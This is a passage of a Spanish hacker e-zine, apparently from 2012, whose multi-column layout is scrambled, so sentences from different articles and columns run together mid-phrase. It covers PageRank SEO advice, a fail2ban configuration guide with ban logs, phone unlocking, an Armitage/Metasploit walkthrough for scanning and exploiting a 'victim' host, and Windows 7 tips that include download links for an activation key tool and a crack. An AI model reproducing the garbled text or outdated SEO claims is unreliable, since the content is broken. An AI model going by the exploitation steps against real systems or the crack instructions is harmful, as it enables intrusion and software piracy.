Pues a ver. Si tienes un page rank 2/10 o 3/10... La verdad, es que de google te van a venir pocas cosas. Lo suyo es tener como m?nimo

4/10 o 5/10. Para lograr aumentar el page rank de tu p?gina, aqu? van algunos consejos imprescindibles:

hecho tiene mogoll?n de bots navegando por Internet

1­ Tener el c?digo de tu pagina, limpio y ordenado,( A Google le

antiguas. Antes a estos estos bots se les llama googlebot y freshbot,

validar vuestras paginas aqu?. De hecho el codigo limpio y ordenado

continuamente en busca de p?ginas nuevas y actualizaciones de el primero indexaba paginas el segundo se encargaba de actualizarlas.

Ahora ya no existen. Parece ser que Google utiliza ya un rango de bots con IP 64.68.82.* que sirven para indexar p?ginas nuevas y tambi?n para meterlas de forma fija en el indice. Una vez que

20

SeNeGe

molan las cosas bien hechas y valorar? la calidad del c?digo). Pod?is no ayuda directamente a subir el Page Rank, pero si que mejora

mucho el posicionamiento de las paginas, osea que es una una manera de aprovechar al maximo nuestro page rank.

2­ Que te "Linken" desde p?ginas que tengan un Page Rank alto. Tal y como los enlaces de p?ginas con Page Rank inferior o igual a 3/10


apenas cuentan para aumentar el Page Rank (aunque si cuentan).

Cualquiera con un Page Rank superior o igual a 4/10 har? que sumes muchos puntos en google. (?l es as? de chulo).

3­ Indexar tu pagina en DMOZ!!!! important?simo, Dmoz es el

directorio en el que google basa sus b?squedas, una vez a?adido tu Blog all?, pasara a ser un Blog "Oficial". ?No esperes m?s a a?adirlo!

Estos son los 3 puntos mas importantes para mejorar el Page Rank en Google,tambi?n son importantes las metas que le pongas a tu pagina y las palabras clave que uses.

"Entre p?ginas que se enlazan hay mucho trapicheo con esto del page rank, por que claro las p?ginas con el Page Rank mas alto

pueden ayudar mucho a una p?gina nueva por ejemplo. Por eso es importante lograr tener un enlace en esas p?ginas, o en los

directorios donde se adecue la tuya, ya que tambi?n suelen tener un Page Rank importante"

Cuando alguien ponga en Google la palabra "Coche" por ejemplo, Google lo que hace es buscar:

­ Primero las webs que tengan la palabra en el dominio mismo, osea en la url www.coche.com por ejemplo, o http://www.paginaweb/coche.

­ Luego las que tengan la palabra coche en su titulo Código:

<Title>Coche</Title>

­ Y por ultimo aquellas que en el cuerpo de la pagina este escrita la

palabra coche. Y es aqui donde influye el page rank, si es un tio con

un page rank 8/10 el que ha escrito por ejemplo "ayer me compre un

Desde aqu? podeis descargar un pdf en ingles que trata el tema del Pag Rank profundamente. Algunos consejos a recordar para mejorar el Page Rank y el posicionamiento de busqueda.

­ Tener el codigo de la p?gina y las hojas de estilo validadas es

muy util. En primer lugar por que tener el codigo ordenado, nos

permite trabajar la p?gina y efectuar los cambios de una manera

much mas comoda. Adem?s siempre es un orgullo tener un codigo limpio, como recompensa a un trabajo bien hecho, es como si te pusiesen un 10 haciendo los deberes.

Pero sobre todo tener un codigo validado es importante por que Google lo bonifica con el posicionamiento de busqueda

­ El que esteis a?adidos en DMOZ. En serio que es super

importante, por que adem?s de mejorar los resultados de vuestra

busqueda, permitira que google os de sirmpre preferencia es como si estuvieseis "registrados" y fueseis sus ni?os bonitos.

­ A?adir vuestras a directorios y buscadores donde tengan cabida, pues normalmente esos links llegan con un Page Rank alto.

­Jugar con las metas en vuestras paginas, a Google le gusta un trabajo bien hecho y explicito, por ejemplo esto seria un buen encabezado, que no el mejor. (Mi p?gina) , aunque google

acostumbra a pasar de todo, son datos que os ayudaran a mejorar el posicionamiento, y ademas sera util para otros buscadores que lleguen a vuestras p?ginas Código:

.<!DOCTYPE html PUBLIC "­//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1­transitional.dtd">

coche" con ese pedazo page rank va a salir en las primeras busquedas, aunque la palabra coche sea tan comun.

Si es un tio con page rank 3/10, pues en una palabra tan comun

como coche, seguramente aparecer? en las ultimas paginas. Ahi esta el detalle del Page Rank

Una p?gina con un Page Rank bajo, puede aparecer en las primeras posiciones de Google por tener una palabra clave en su url o en su titulo. Pero claro las palabras que podemos meter en un title son

limitadas, lo suyo es que sean las palabras del cuerpo de la pagina las que aparezcan en buenas posiciones, por que esas son las que cuentan, las que se actualizan, y las que son un monton.

De todas las paginas que puedan tener en unenlace a la tuya, para

google cuentan las que tienen Page Rank 4/10 o superior. Las demas tambien cuentan pero su valor es menor, ademas aunque las ve no son tan importantes.

21

Código:

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es­ES" lang="es­ES"> <head>

<title>xxxxx Blog ­ Web personal de xxxxx</title> <meta name="description" content="xxxx" />

<meta name="keywords" content="Bitacora, Blog, Blogs, Weblog, Weblogs, Web Personal" />

<meta name="author" content="xxx xxx xxx" /> <meta name="robots" content="all" />

<meta http­equiv="Content­Type" content="text/html; charset=iso­ 8859­1" />

<meta http­equiv="Content­Language" content="es" /> <meta name="copyright" content="tu nick" /> <meta name="Reply­to" content="tu mail" />

<meta name="generator" content="tus herramientas" />


<base href="http://(vuestra url)/" /> Todo esto es un poco pijerio ya lo se, pero es util para google, si

estais interesados en que os trate bien y en aumentar las visitas a vuestras p?ginas, lo tendreis que tener en cuenta. Calculando el Page Rank Dado que el PageRank se traspasa entre p?ginas, mediante enlaces, para calcular (siempre de forma aproximada) el PageRank total de

una p?gina web habr? que saber el PR que recibe de cada uno de los enlaces que apuntan a ella.

Cada documento web tiene la capacidad de repartir el 85% de sus

puntos de PR entre todos los enlaces que contenga. Esto quiere decir que el PR que otorga un enlace se calcula como el PR de la p?gina en cuesti?n, multiplicado por 0.85 y dividido entre el n?mero de

enlaces total que contenga. De forma orientativa, dado que es muy

probable que las puntuaciones hayan variado a lo largo del tiempo, la tabla de correspondencia entre puntos de PR y rangos de PR (de 0 a 10) era la siguiente: C贸digo:

PR1 = 0.00000001 hasta 5 PR2 = 6 hasta 25

PR3 = 25 hasta 125

PR4 = 126 hasta 625

.....

PR10 = 1953126 hasta infinito Por ejemplo una p?gina de PR6 (supongamos 3200 puntos) con 20 enlaces traspasa 136 puntos de PR a cada una de las p?ginas a las que apunta: 3200 x 0.85 / 20 = 136

Muchas veces es m?s beneficioso recibir PR de p?ginas con poca

puntuaci?n pero tambi?n pocos enlaces totales, que de una p?gina de

PR alto y muchos enlaces. Estos datos son utiles, pero son antiguos y no todos los expertos los comparten, aun asi os pueden ayudar a haceros una idea orientativa bastante importante. Fuente: Javi 颅 forobuscadores.com

?Como reconocer a los bots de Google? Si tienes acceso a los "logs" de tu servidor, puedes saber si el

Googlebot ha pasado por tu sitio y lo ha indexado. S?lo tienes que

buscar las ips de los bots. Los bots de google tienen un rango de ips desde 64.68.82.*

Es importante tener en cuenta para que los buscadores trabajen bien, y para que si lo deseais no indexen algunas p?ginas o carpetas

"secretas" que querais tener en vuestro servidor. Debeis crear un

22

archivo llamado robots.txt en cuyo contenido aparezca lo siguiente: # robots.txt for el que lo quiera C贸digo:

User颅agent: *

Disallow: /admin/ # aqui las carpetas que querais que nadie vea Recomendado: http://www.robotstxt.org/

?Habeis visto el robots.txt de google alguna vez? http://www.google.com/robots.txt



FAIL2BAN Como proteger servicios de ataques de fuerza bruta

los dos ultimos fines de semana tuve q sacar intrusos de servidores q

administro, nada peligroso ya q los

equipos estan actualizados y bastante protegidos dentro de lo posible, pero siempre esta el problema de los

usuarios y el cuidado q le dan a sus contraseñas... en

los spammers/scammers estan en la

escala mas baja de la porqueria existente en internet, tanto desde el punto de vista

del usuario q recibe montones de correos

q no le importan como del administrador q trata de hacer todo lo posible para

minimizar el impacto en el buzon del usuario final.

ambos casos se

vieron comprometidas

pero el peligro no esta

cuentas de los

solo en parar la basura

mismos. en la 1era

sino tambien en

lograron entrar x ssh

proteger nuestros

y correr un script q

servers ya q son una

enviaba spam, en la

2da simplemente un login de correo

con el mismo proposito pero enviando una scam tipica, este era el texto:

Please be informed that you have

£100,000 British Pounds Lodged in our Western Union to transfer to you as

winner of ECOWAS Lottery Jackpot. Please Contact:

milton_daniel17@yahoo.com al entrar hizo un par de pruebas

enviandose a direcciones propias q son las siguientes:

kenblast2003@yahoo.com kenblastall@hotmail.com motide7@aol.com

no fue lo suficientemente inteligente para borrar ni siquiera los correos q enviaba, simplemente consiguio la

pass del usuario y me puso en cola 10 millones de correos q se estuvieron

enviando durante unas horas hasta q me di cuenta. creo q penso q siendo

domingo no lo veria hasta el lunes pero x suerte suelo checkear logs bastante seguido.

24

|_ocutus

codiciada presa para

ellos, la oportunidad de hacer unos

cuantos billetes a costa de nuestro buen nombre... je

asi tambien tenemos los miles de script

kiddies q pasan el dia con sus programas de fuerza bruta y sus diccionarios

probando combinaciones de user/pass y

algun ocasional hacker o aprendiz q puede ocasionar algo mas de trabajo. mas de

uno se sorprenderia al ver los logs de un

server publico, al final de la entrada voy a

pastear algunos para q vean el nivel de los ataques...

para detener este tipo de ataques

automatizados existe fail2ban, q es un

software q en base a los logs del sistema puede bannear IPs en base a intentos fallidos de logueo. a pesar de tenerlo

instalado en la mayoria de los servers tuve q ponerlo en TODOS y ajustar la

configuracion para q sea todavia mas

agresiva. de paso aprovecho para hacer esta entrada para q vean q no es nada

dificil de instalar y configurar y ciertamente hace darse x vencido a la mayoria de los intrusos.

instalacion

a pesar de q son muy parecidas voy a explicar la instalacion tanto para

centos/redhat como para debian/ubuntu. para el 1ero tenemos q descargarlo desde:

http://sourceforge.net/projects/fail2ban/ lo extraemos con:

tar xvf fail2ban­x.x.x.tar.bz2 despues...

cd fail2ban­x.x.x

python setup.py install

a continuacion lo agregamos al arranque del sistema copiando el siguiente archivo:

cp /files/redhat­initd /etc/init.d/fail2ban chkconfig ­­add fail2ban chkconfig fail2ban on service fail2ban start

en debian/ubuntu lo podemos bajar de los repositorios con:

apt­get install fail2ban (sudo en ubuntu) lo siguiente es configurar las "jails" para los servicios q queremos proteger. para

eso vamos a /etc/fail2ban y editamos el archivo jail.conf haciendo una copia de seguridad antes por las dudas...

la configuracion puede variar un poco de una version a otra pero las opciones son mas o menos las mismas siempre. en

debian x ejemplo, las acciones, tiempos de banneo, etc vienen definidas al

principio de manera gral o se pueden personalizar despues en cada jail.

lo primero es setear las redes e IPs seguras, o sea las q queremos q el

sistema no blockee nunca, como el rango de nuestra propia lan o


direcciones de usuarios del sistema. esto se

"actions" con el campo "banaction".

paso a mi) de que el webmail corra en

ejemplo:

en el action de centos vemos dos

otro. en este caso nos vemos obligados

ignoreip = 127.0.0.1 192.168.0.0/24

1era crea una regla de iptables

hace modificando el campo "ignoreip", por

200.53.23.1 10.0.0.0/25

mas abajo tenemos los tiempos y situaciones del blockeo, q podemos dejar como estan o

editarlas como queramos. son las siguientes: bantime: es la cantidad de segundos q una IP es banneada (default 600).

acciones, iptables y sendmail whois. la blockeando la IP y la 2da envia un

correo con un whois de la misma al

destinatario configurado (root en este caso).

vamos a crear alguna jail mas x si no quedo muy claro, postfix en centos:

un server mientras q el MTA esta en

a agregar la IP del 1ero en la lista de

ignoradas del fail2ban del 2do para no bannear a todos los usuarios ya q la direccion de origen del logueo es siempre la misma para todos.

para solucionar esto podemos usar un plugin escrito x matt rude, q se puede descargar desde aca:

http://mattrude.com/projects/roundcube­

findtime: un host es banneado si se loguea

[postfix­tcpwrapper]

en "maxretry" dentro del "findtime" (default

filter = postfix

hay q copiar el contenido dentro del

(ruta al archivo hosts.deny)

(roundcube/plugins) y despues editar el

erroneamente tantas veces como la cantidad 600seg).

maxretry: es el numero de intentos fallidos antes de ser blockeado.

pasamos ahora a configurar las jails

(carceles). una de las mas usadas es la de ssh asi q empecemos x esa, vamos hasta

"[ssh]" y x default (en debian x lo menos) ya la tenemos activada. sale mas o menos asi: [ssh]

enabled = true port = ssh

filter = sshd

logpath = /var/log/auth.log maxretry = 6

y asi para centos: [ssh­iptables]

enabled = true filter = sshd

action = iptables[name=SSH, port=ssh, protocol=tcp]

sendmail­whois[name=SSH,

dest=root, sender=fail2ban@fail2ban] logpath = /var/log/secure maxretry = 6

lo q mas nos interesa es q el enabled este en "true" (activada) y el logpath q es la ruta del

enabled = true

action hostsdeny[file=/etc/hosts.deny] = sendmail[name=Postfix,

dest=root]

logpath = /var/log/maillog bantime = 6000 en debian: [postfix]

enabled = true

esta dentro del directorio "config",

agregando en la seccion de plugins la siguiente linea:

$rcmail_config['plugins'] = array('fail2ban');

logpath = /var/log/mail.log

conteniendo solo los intentos fallidos q

filter = postfix

y asi tenemos todo tipo de jails para ftp, http y todos los servicios y la mayoria

llamado userlogins en la carpeta logs usamos para el fail2ban creando una nueva jail:

de los ataques posibles. seria

[roundcube]

explicarlas una a una, simplemente

port = http,https

interminable y no tendria mucho sentido experimentando un poco se pueden activar bastante facil. roundcube

roundcube es un cliente de webmail

relativamente nuevo (todavia esta en

enabled = true

filter = roundcube logpath =

/pathderouncube/logs/userlogins el eterno punto debil

beta) con muchisimas opciones y una

obviamente esto no nos deja 100% a

ninguna otra. en mi humilde opinion es

formas nunca es bueno confiarnos

interfaz q no tiene nada q envidiarle a muy superior al eterno squirrelmail q parece casi prehistorico al darle una mirada a uno y el otro.

debian vemos q falta el campo "action", eso

q usemos como vimos antes, pero

25

contenido del archivo main.inc.php q

con esto se crea un nuevo archivo

los logueos de correo pueden ser

es xq viene definido antes en la seccion

directorio de plugins de roundcube

port = smtp,ssmtp

log de seguridad del sistema, esta cambia de un sistema a otro como se puede ver. en

fail2ban­plugin/

blockeados con la jail "postfix" o el MTA tambien se puede dar el caso (como me

salvo pero ayuda bastante, de todas demasiado y mantener siempre los

sistemas actualizados, los permisos

bien configurados y los usuarios con las passwords mas complejas posibles... aunque siempre seran usuarios y

siempre cabe la posibilidad de q hagan click donde no deben entregando sus

datos ante cualquier loteria de turquia o


una herencia del principe de liechtenstein... ... ese es el verdadero punto debil. apendix

como habia prometido copio unas horas del log de fail2ban en un servidor de correo publico (no muy grande) para q vean la cantidad de conexiones blockeadas. la mayoria son de postfix pero hay alguna de ssh.

2012­05­24 04:02:41,098 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.49.25.205 2012­05­24 04:14:01,114 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.224.163.183

2012­05­24 04:52:59,128 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 186.105.151.68

2012­05­24 05:01:16,142 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 90.170.212.117

2012­05­24 05:01:32,156 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.172.162.35

2012­05­24 05:31:24,170 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 188.138.115.237

2012­05­24 05:54:26,188 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.1.142.88 2012­05­24 05:56:43,202 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.139.154.117

2012­05­24 06:04:14,217 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.14.149.157

2012­05­24 06:42:19,230 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.16.233.253

2012­05­24 06:47:21,242 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 189.45.204.138

2012­05­24 06:54:42,259 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 41.79.176.10

2012­05­24 07:13:24,273 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.14.133.18 2012­05­24 07:14:32,287 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 168.226.249.18

2012­05­24 07:18:01,301 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 168.226.165.193

2012­05­24 07:19:59,315 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.14.130.174

2012­05­24 07:28:02,330 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.31.98.41 2012­05­24 08:02:34,618 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 181.14.150.101

2012­05­24 08:03:04,633 fail2ban.actions: WARNING [postfix­tcpwrapper] Ban 190.139.223.41

2012­05­24 08:16:23,647 fail2ban.actions: WARNING

26



SERVICIO E-ZINE Hola amigos en esta ocasión les traigo una pequeña investigación de las personas que reparan nuestros teléfonos celulares. ¿Porque sobre ellos?

Por que como hoy en día la mayoría de

nosotros andamos un teléfono celular y a uno que otro de nosotros se nos ha estropeado, queremos liberarlo,

desbloquearlo, o simplemente queremos actualizarlo.

Ahora veremos un proceso de cómo es que se libera un teléfono Sony Ericsson E15 (Xperia X8).

Con herramientas profesionales y usadas

Después de tener las herramientas

necesarias, comenzamos con el proceso de liberación para nuestro teléfono.

Conectamos nuestro teléfono a la Box con

por un profesional.

En este caso usaremos una herramienta que se llama Medusa Box, cable de servicio para el modelo antes mencionado y su respectivo software.

nuestro cable de servicio.

Lo conectamos con el software y le

damos clic en la opción que nos dice “Unlock” esperamos que termine el proceso y listo teléfono liberado.

Después de tener las herramientas necesarias, comenzamos con el proceso

28

nomo11

Desconectamos y a disfrutar nuestro teléfono con cualquier compañía.


¿Muy sencillo no? ¿Crees que tú lo puedes hacer solo adquiriendo las herramientas? ¿Crees que no hay más detrás del proceso?

Bueno amigos perdón por expresarme así pero la verdad hay muchas personas que no les parece el precio por el servicio que se les da y piensan que aunque se vea fácil y sencillo de hacer, es muy complicado, porque podemos adquirir cualquier herramienta para poder hacerlo nosotros mismos, pero si no sabemos cómo usar el software, cómo usar el cable, qué hacer cuando estemos haciendo todos los pasos bien y el software nos marque algún error desconocido, eso es por eso que se cobra el servicio y aunque hay veces no nos parezca el precio, las personas que lo hacen son profesionales e invierten en su conocimiento y

29

herramientas. Ya ahí viene el dicho: “Se cobra por lo que se sabe, no por lo que se hace” “Precio de tornillo a cambiar $ 10 pesos, saber que tornillo cambiar $ 100 pesos” ¿Quieres un servicio exprés? Hay muchas personas que quieren un servicio súper exprés, o por lo menos lo quieren en menos de 30 si no su servicio lo quieren gratis. En algunas ocasiones, se les otorga un servicio exprés, pero también depende el modelo de teléfono, aunque hay veces nos parezca increíble, un teléfono sencillo o muy básico nos puede llegar a costar más caro liberarlo que lo que nos costo y puede tardar hasta 2 o 3 días en liberarlo. ¿Por qué? Por que el nivel de seguridad es muy alto o nuevo que todavía no hay dicha herramienta y sale muy caro el código de liberación. También, es el mismo caso con las reparaciones físicas, ya que puede ser que el fabricante sea muy elevado el costo de fabricación del producto y también es por eso que hay veces que la refacción nos sale también más caro que el teléfono. Bueno amigos ahora ya tienen un idea de cuándo llevemos nuestro teléfono a servicio técnico y no andemos con berrinches por qué no nos parece el trabajo que nos van a realizar.


armitage

Primero que nada bienvenidos a esta

Entrando a un equipo

pondré la ip local, ahora si tu maquina es

parte del articulo de la ezine en esta

local pero son muchas maquinas y no

parte veremos armitage que es una

sabes ¿Cuál esta encendida? ¿Cuál tiene

herramienta grafica para poder usar

una vulnerabilidad? Puedes hacer otro tipo

metasploit.

Para utilizar armitage tenemos que

Aca si te sale esa ventana le

Le doy en OK

Puedes visitar su pagina oficial que

Por ultimo termina el escaneo ahora me

contiene mucha información necesaria:

dice que use buscar ataques… para poder

http://www.fastandeasyhacking.com

Windows,Linux y mac, en este caso utilizaremos backtrack que en este

mismo articulo puedes ver como se instala.

y escanea todas las maquinas en red en pcs…

actualizado, y armitage…

ah! Por cierto, armitage lo puedes usar

de escaneo 192.168.x.x/24 le agregas el 24 este caso la ip seria desde el modem y las

tener por lo menos java, metasploit

Bueno empecemos abriendo armitage ,

host, en mi caso como la maquina es local

das en YES

Luego empezara a realizar su coneccion…. Ya luego estará listo armitage…

Ahora lo primero que hacemos siempre para poder identificar una maquina vulnerables es hacerle footprinting o recolección de

datos sobre la maquina o victima, en este

caso analizaremos sus puertos aver cual es vulnerable e intentaremos acceder, aaah!

Otra cosa es que no solo acepta escaneos de nmap son también de:

Acunetix, nessus,openvas,retina y otros mas pero puse los que conozco por que son

explotar…

Una cosa importante es que tengo

habilitado el firewall de mi pc, muchas

veces se lo puede brincar el firewall hay

muchos métodos para poder hacerlo, pero este tema no lo tocaremos…

Entonces tenemos un Windows :P que no sabemos todavía si es vulnerable, asi que

Abrimos el armitage….

buscamos los ataques..

famosos en internet xD!

Host>Nmap Scan>Intense Scan

Como ves allí tenemos para escanear con

nmap en este caso los puertos un escaneo

poner tu ip publica o tu ip privada, en port

el puerto que quieras y user y pass lo mismo

es un ejemplo practico lo veremos asi… le damos en connect…

30 arthusu

Lo siguiente solo seleccionamos el host en parte de attack buscamos un posible

coneccion, por ejemplo en host puedes

configurado asi, pero en este ejemplo como

Dice que el análisis de ataque se completo esta caso un windows clic derecho y en la

Aquí puedes configurar el armitage para la

lo que tu quieras no es necesario tenerlo

Nos tirara un mensaje como el siguiente:

intenso:P

Luego te pide la ip a escanear puedes hacer un simple ping para conseguir la ip de un


ataque que pueda funcionar :D

Asi que intentaremos ese ataque… Aquí nos sale lo que podemos configurar…

Esto significa que esta lanzando los exploits probando cual funciona.

LHOST = local host nuestr ip local

LPORT = local port al que estaremos escuchando o conectando

RHOST = ip publica o local de la victima seria xD

RPORT = el puerto a atacar

Targets = es el tipo de sistema operativo

Tambien podemos habilitar la opción

use a reverse conection que puede ser muy interesante.

Ahora si la maquina no es vulnerable te saldrá No

daremos en Launch

vulnerable por que le meto a cada rato los parches

Por ultimo para lanzar el exploit le Ahora si el ataque no es exitoso como

esperabas puedes intentar mas exploits o puedes intentar usar la opción de

autpwn de metasploit que va probando

acitve sessions. En mi caso mi maquina no es nuevos que van saliendo y tengo el sistema

actualizado aunque sea XP XD!, ahora si lo

intentamos con una maquina vulnerable que pasa…

exxploits y configurándolos

automáticamente hasta ver si la

maquina es vulnerable… para ello

haremos:

Y saldrá:

Y listo una maquina en tu posición sistema operativo Linux :D Saludos a todos! Dhackers por siempre Arthusu 2012

31


Trucos Windows 7 Desde que hay windows siempre tenemos

para volver adescargar de nuevo es muy

toca a Windows 7 el sistema operativo mas

copia de seguridd de una manera muy

formas de hacer diferentes trucos, ahora le

usadoo y actual en este momento, vamos a mostrar algunos truquitos para mejorar la

tedioso entonces hay forma de hacer una facil:

finalidad y saber mas a serca de este OS.

Primero vamos a bontón de inicio de

1 ­ Cual es el mejor antivirus para

cuadro de búsqueda:

Windows 7?

Pues hay muchos pero personalmente

recomiendo, Avast Antivirus Home Edition Y AVG antivirus Free.

2 ­ Como Bloquear la sesión de Windows 7 desde un icono partiendo del escritorio.

Para esto lo que vamos a hacer es; crear un icono de acceso directo al bloqueo del ordenador hacemos los siguiente:

Clic con el botón derecho del ratón en el escritorio y seleccionamos "nuevo".

Luego Seleccionamos "acceso directo". proseguimos a que nos pedirá de introducir un campo de texto y escribimos esto :

rundll32.exe user32.dll,LockWorkStation

Windows y escribimos lo siguiente en el C:\Users\Username\AppData\Local\Micros oft

Cambia "C" por la unidad en la que tengas instalado tu Windows 7 y "username" por el usuario que tengas para iniciar sesion.

4 ­ optimizar el rendimiento de Windows7 con discos SSD

Hoy en dia Windows 7 tiene preparado

para detectar la instalación de discos SSD,

tras lo cual, automáticamente deshabilita la defragmentación, pero es bueno asegurarse de ello, por lo que vamos a panel de

control, herramientas administrativas y

luego a Servicios, ahí buscamos el servicio Defragmentador de Disco y lo deshabilitamos (sigue).

entonces le damos a siguiente e

El uso de discos SSD acelera los tiempos

por ejemplo : bloquear PC

lo que la opción de hibernación pierde

introducimos el nombre del acceso directo,

Y listo solo finalizamos y ya tenemos el

icono para bloquear el ordenador con un simple doble clic encima.

Tambien podemos dejar el icono en el

escritorio o anclarlo a la barra de tareas con lo que simplemente pincharemos una vez con el ratón en el y la máquina bloqueará la sesión.

3 ‐ Hacer copia de seguridad de nuestros gadgets de Windows 7

Es importanter siempre que tenemos

muchos gadgets y no queremos perderlos

32 IPepe

de encendido y apagado del ordenador por sentido.

Teniendo claro que no usaremos el modo

de hibernación, deshabilitándolo te librarás del archivo hiberfil.sys, el cual ocupa, en mi caso 2,3 Gb y está en la raiz de la

unidad donde tenemos instalado Windows

7. Para ver este archivo de sistema tendrás

que ir a las opciones de carpeta y búsqueda y elegir "ver archivos y carpetas ocultos". Para deshabilitar la hibernación iremos a

Inicio, escribiremos CMD, pulsaremos Enter y en la ventana negra de DOS

escribiremos powercfg –h off y con ello la hibernación quedará deshabilitada y te librarás de ese pesado archivo.

5 ­ Instalar Windows 7 con todos los pasos explicados

LA INSTALACION! 1. Introducir el DVD de Windows 7 2. Nos aparecerá un texto como el

siguiente “Presione cualquier tecla para arrancar desde el CD o DVD”, presionamos cualquier tecla

3. Finalmente veremos la pantalla de

presentación de Windows 7, en donde nos preguntaran el idioma y demás opciones. Seleccionamos el español y luego

terminamos de configurar la hora y el teclado

4. Hacemos clic en el botón “Instalar Ahora”.

5. A continuación deberás leer el contrato

de licencia de Microsoft para luego aceptar los términos de licencia. Por ultimo debes hacer clic en Siguiente.

6. En la siguiente pantalla tendrás dos

opciones, la de actualizar el (Upgrade) y la de la instalación personalizada (custom). Hacemos clic en Personalizada.

7. Seleccionaremos cualquier partición que tengamos disponible y haremos clic en

instalar. SI no tenemos formateado el disco rígido, tendremos que hacer clic en

“Formatear” para dejar sin archivos a esa partición.

8. Cuando hayas formateado la partición, te ubicaras donde quieres instalar el Windows 7 y le das clic en siguiente.

9­ Una vez terminado el copiado de

archivos, escribirás un nombre de usuario y nombre de equipo si tu quieres. Click en siguiente

10.En la siguiente pantalla nos preguntaran una contraseña, la cual obviamente será opcional y personal. Puedes dejar en

blanco estos campos si tu lo deseas. Clic en


siguiente.

11. En esta ventana ingresaras el numero de serie Windows 7, por ultimo le haces clic en siguiente

12. En la siguiente pantalla seleccionamos

Descarga de la herramienta:

1. diskpart

6f1b46e45f2c331cf72baadcb21e/Hack_7_si

3. select disk 2 (hay que

http://shareflare.net/download/87780.87e69 npass.rar.html

“Usar la configuración recomendada”

13. Configuras tu zona horaria dependiendo donde te encuentres.

14. En este paso deberes elegir la ubicación del equipo; Casa (red domestica), Trabajo (red de trabajo), Cyber o demás (Red Publica).

Finalmente has terminado con la instalación de Windows 7.

6 ­ Herramientas seleccionadas para tunear tu Windows 7

Para ver el video:

http://www.youtube.com/watch?feature=pla yer_embedded&v=Xac8kl_RZJQ 7­ Como activar tu Windows 7 Con la heramienta Windows 7 OEM Key Ahora esta herramienta dispone de

actualización de las Claves de producto y de los Certificados.

Descarga: http://hotfile.com/dl/122904513/81751d8/

Windows_7_OEM_Key_3.29.06.2011.exe. html

http://www.fileserve.com/file/cdsfaqM https://rapidshare.com/files/891213057/Win dows_7_OEM_Key_3.29.06.2011.exe

8 ­ Crackear Windows 7 para toda la vida:

Ahora podemos Crackear windows 7

(32/64) para toda la vida, Solo abrir luego ejecutar la aplicación, darle a intalls,

esperar, darle a ok y se reinicia el pc, una

vez iniciado windows, ya tienes windows 7 original de por vida.

33

9 ­ Instalar Windows 7 desde una llave USB

No es dificil lo único que tendremos que tener en cuenta es el hecho de que será

necesario contar con una llave de memoria USB con la suficiente capacidad. La

imagen ISO del DVD de Windows 7 Beta

2. list disk

reemplazar el 2 con el número de disco en el que se detecte nuestra unidad USB) 4. clean

5. create partition primary 6. active

7. format fs=fat32 quick 8. assign

9. exit creamos la partición de arranque en la llave USB

debe ser descomprimida en un directorio

Con la imagen ISO de Windows 7 Beta en

lo que necesitaremos 4 Gbytes de capacidad

anteriormente en el disco duro,

dentro de la unidad de almacenamiento, por como mínimo. Lo siguiente que tenemos que hacer es comprobar que la BIOS del ordenador donde vayamos a realizar la

instalación es compatible con el arranque

desde una unidad USB. Lo cierto es que es lo más probable si el PC cumple con los

requisitos mínimos para instalar Windows 7.

Ahora vamos a preparar la llave para

empezar tendremos que preparar la llave USB, dándole el formato correcto y

activando la partición que crearemos para

almacenar luego los contenidos del DVD .

Para ello abrimos una consola de comandos escribiendo command en la opción ejecutar

del menú inicio y escribiremo uno detrás de otro los siguientes comandos seguidos cada uno de la tecla enter:

32 o 64 bits que hemos guardado

simplemente tendremos que hacernos con un programa capaz de extraer todos los

ficheros de esa imagen ISO. Uno de los más populares y recomendados es MagicISO.

finalmente tendremos que elegir la imagen del disco de instalación de

Windows 7 y descomprimir todos sus archivos a la llave USB. Luego

simplemente introduciremos la llave USB en el ordenador donde queramos instalar Windows 7, estableceremos en la BIOS que arranque desde USB y daremos comienzo a la instalación.


Conociendo mi PC

¿Qué es el Hardware?

Software de aplicación:

El hardware se refiere a todos los

cabo una o varias tareas específicas, en

componentes físicos de las computadoras, como lo

son el disco dura, la grabadora de DVD, la placa madre, el microprocesador, etc

Aquel que permite a los usuarios llevar a cualquier campo de actividad susceptible de ser automatizado o asistido, con especial énfasis en los negocios. Incluye entre otros:

Software

Aplicaciones de Sistema de control y

El software es una secuencia de

_ Aplicaciones ofimáticas

instrucciones, las cuales le dicen a los compones físicos

cómo deben realizar una tarea en particular.

Que es un Software de sistema:

automatización industrial .. _ Software educativo _ Software médico

Ni más ni menos que la Unidad Central

_ Software de Diseño Asistido (CAD)

centro de operaciones de cualquier

_ Software de Cálculo Numérico

_ Software de Control Numérico (CAM)

Su objetivo es desvincular adecuadamente

Datos e Información

de la computadora en particular que se

En informática decimos que lo que

procesamiento referido a las características

los mismos son procesados y luego los

al usuario y al programador de los detalles use, aislándolo especialmente del

internas de: memoria, discos, puertos y dispositivos de comunicaciones,

impresoras, pantallas, teclados, etc. El

software de sistema le procura al usuario y

ingresamos a la computadora son datos, resultados obtenidos de los datos de

entrada los denominaremos información (es decir los datos ya procesados).

programador adecuadas interfaces de alto

Vamos a un ejemplo: Supongamos que

que permiten su mantenimiento.

números (2+2) con la calculadora que trae

nivel, herramientas y utilidades de apoyo

deseamos realizar una suma de dos

el sistema operativo windows, decimos

Software de programación:

entonces que ingresamos datos ( 2+2) por

Es el conjunto de herramientas que

el botón con el símbolo = para que nos

permiten al programador desarrollar

programas informáticos, usando diferentes alternativas y lenguajes de programación, de una manera práctica. Incluye entre otros:

del Sistema (System Unit en inglés) es el computadora.

